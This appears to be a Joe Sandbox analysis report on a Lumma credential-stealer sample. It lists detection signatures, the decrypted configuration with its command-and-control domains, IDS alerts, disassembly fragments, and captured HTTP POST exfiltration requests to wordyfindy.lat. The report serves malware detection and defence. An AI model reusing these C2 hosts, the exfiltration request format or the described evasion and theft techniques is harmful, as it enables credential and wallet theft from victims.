Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
external.exe

Overview

General Information

Sample name:external.exe
Analysis ID:1579555
MD5:88cd76e4609e50c6435ebc4771427d2c
SHA1:e86ece49d9d75aebf84e82ba5886014d2a6e302e
SHA256:42011c4da8ac276fb88efb72aacf717bc57878f5e9a70b9994e4c224c46800bd
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • external.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\external.exe" MD5: 88CD76E4609E50C6435EBC4771427D2C)
    • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • external.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\external.exe" MD5: 88CD76E4609E50C6435EBC4771427D2C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wordyfindy.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "bellflamre.click", "shapestickyr.lat", "bashfulacid.lat", "curverpluch.lat", "tentabatte.lat"], "Build id": "LPnhqo--alaeljhsfdmg"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: external.exe PID: 7140JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: external.exe PID: 7140JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: external.exe PID: 7140JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T00:12:00.721501+010020283713Unknown Traffic192.168.2.449730104.21.19.35443TCP
                2024-12-23T00:12:02.708743+010020283713Unknown Traffic192.168.2.449731104.21.19.35443TCP
                2024-12-23T00:12:05.137214+010020283713Unknown Traffic192.168.2.449732104.21.19.35443TCP
                2024-12-23T00:12:18.646834+010020283713Unknown Traffic192.168.2.449735104.21.19.35443TCP
                2024-12-23T00:12:20.849251+010020283713Unknown Traffic192.168.2.449738104.21.19.35443TCP
                2024-12-23T00:12:23.461200+010020283713Unknown Traffic192.168.2.449740104.21.19.35443TCP
                2024-12-23T00:12:26.189139+010020283713Unknown Traffic192.168.2.449742104.21.19.35443TCP
                2024-12-23T00:12:30.898745+010020283713Unknown Traffic192.168.2.449743104.21.19.35443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T00:12:01.470847+010020546531A Network Trojan was detected192.168.2.449730104.21.19.35443TCP
                2024-12-23T00:12:03.527568+010020546531A Network Trojan was detected192.168.2.449731104.21.19.35443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T00:12:01.470847+010020498361A Network Trojan was detected192.168.2.449730104.21.19.35443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T00:12:03.527568+010020498121A Network Trojan was detected192.168.2.449731104.21.19.35443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T00:11:58.949369+010020582121Domain Observed Used for C2 Detected192.168.2.4566471.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T00:12:24.539100+010020480941Malware Command and Control Activity Detected192.168.2.449740104.21.19.35443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["wordyfindy.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "bellflamre.click", "shapestickyr.lat", "bashfulacid.lat", "curverpluch.lat", "tentabatte.lat"], "Build id": "LPnhqo--alaeljhsfdmg"}
                Source: external.exeVirustotal: Detection: 37%Perma Link
                Source: external.exeJoe Sandbox ML: detected
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bellflamre.click
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--alaeljhsfdmg
                Source: C:\Users\user\Desktop\external.exeCode function: 2_2_00414DF0 CryptUnprotectData,2_2_00414DF0
                Source: external.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: external.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\external.exeCode function: 0_2_00719126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00719126
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h]2_2_0043D0E0
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3E34CFBAh]2_2_0042C273
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042C273
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]2_2_00425B50
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0042BB35
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0042BB35
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov dword ptr [esp], edx2_2_0042BB35
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_0043BC60
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov word ptr [eax], dx2_2_00414DF0
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0040CD9C
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov edi, ecx2_2_0040CD9C
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E1A2961Bh2_2_0043A6D4
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]2_2_00438750
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then push eax2_2_0040B75E
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041C840
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7Dh]2_2_0041C840
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov esi, edx2_2_00408860
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov word ptr [edi], ax2_2_00425079
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov word ptr [edi], cx2_2_0041C0E0
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004298E0
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]2_2_00408090
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 73004FCFh2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000ABh]2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], D6A985C1h2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+2845CDC9h]2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 5E874B5Fh2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 888A0AE0h2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], D6A985C1h2_2_00419890
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]2_2_00422F90
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]2_2_00422F90
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then jmp eax2_2_0042891E
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov ebx, dword ptr [esp]2_2_00428134
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004331D0
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042A9E8
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ecx, cx2_2_0042C9AF
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov edx, ecx2_2_0043B9B0
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0041EA50
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h]2_2_0043D270
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov edi, eax2_2_0043AA2A
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov ecx, eax2_2_00422232
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+06h]2_2_0042834D
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042834D
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042834D
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]2_2_00421B60
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+05h]2_2_00427B00
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], FAD59DE2h2_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 29FCC5D8h2_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 3FE33C50h2_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then lea esi, dword ptr [esp+00000098h]2_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edi+2845CE35h]2_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 73B6CFD8h2_2_00416B06
                Source: C:\Users\user\Desktop\external.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-29138FE1h]2_2_0040CB10

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.4:56647 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 104.21.19.35:443
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: bellflamre.click
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.19.35:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XQ441IQ67QVVKRAZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7H38HNDLAUCUAG4XREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U0L58UWFFPJHJWO6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NAO7Q2RF23FZTLBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1244Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NHUHIGZRFFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568452Host: wordyfindy.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: bellflamre.click
                Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wordyfindy.lat
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: external.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: external.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
